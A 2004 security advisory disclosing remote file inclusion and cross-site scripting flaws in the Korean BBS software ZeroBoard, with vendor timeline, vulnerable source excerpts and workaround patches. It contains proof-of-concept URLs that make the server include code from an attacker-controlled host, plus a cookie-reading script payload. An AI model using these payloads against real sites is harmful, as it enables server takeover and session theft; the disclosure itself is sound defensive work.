STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

2004-12-25T00:00:00
ID SECURITYVULNS:DOC:7447
Type securityvulns
Reporter Securityvulns
Modified 2004-12-25T00:00:00

Description

STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

Revision 1.2 Date Published: 2004-12-20 (KST) Last Update: 2004-12-24 Disclosed by SSR Team (advisory@stgsecurity.com)

Summary

ZeroBoard is one of widely used web BBS applications in Korea. . However, an input validation flaw can cause malicious attackers to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.

Vulnerability Class

Implementation Error: Input validation flaw

Impact

High : arbitrary commands execution.

Affected Products

ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED

2004-11-20 Vulnerabilities found. 2004-11-20 1st vendor contact, but they didn't replied. 2004-11-22 2nd vendor contact, but they didn't replied. 2004-12-13 STG Security, Inc. customer notified. 2004-12-24 Official release.

Details

Vulnerability 1 : PHP source injection vulnerability


      • Proof of concept http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/
      • Environment PHP 5.0.x php.ini : register_globals = On
      • Description As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path parameter in outlogin.php can be easily exploited.
      • Part of vulnerable source, outlogin.php.

  • // 제로보드 디렉토리 인지 체크 if(!file_exists($_zb_path."lib.php")) { echo "제로보드 디렉토리가 아닙니다"; return; }

// _head.php 읽음 @include $_zb_path."_head.php";

}


Vulnerability 2 : PHP source injection vulnerability


      • Proof of concept http://[victim]/include/write.php?dir=http://[attacker]/
      • Environment php.ini: register_globals = On
      • Reason Uninitialized $dir variable in write.php
      • Part of vulnerable source, include/write.php

  • include $dir."/write.php";

Vulnerability 3 : Cross-site scripting vulnerability


      • Proof of concept http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc ript>
      • Reason check_user_id.php doesn't validate the input value of user_id.
      • Part of vulnerable source, check_user_id.php

  • $user_id = trim($user_id); ... 생략 ... if($check[0]) echo "$user_id 는 이미 등록된<br> 아이디입니다"; else echo"$user_id 는 사용하실수 있습니다"; ... 생략 ...

Workaround

Without official patches of theses vulnerability, modify the vulnerable sources as following recommendations.

Vulnerability 1: As of zboard 4.1pl4


Insert the following code at 59th line of outlogin.php,

if(eregi(":\/\/",$_zb_path)) $_zb_path="";

Vulnerability 2: As of zboard 4.1pl4


Insert the following code at 15th line of include/write.php,

if(eregi(":\/\/",$dir)) $dir="";

Vulnerability 3: As of zboard 4.1pl4


Insert the following code at 3rd line of check_user_id.php,

$user_id = htmlspecialchars(trim($user_id));

Credits

Jeremy Bae at STG Security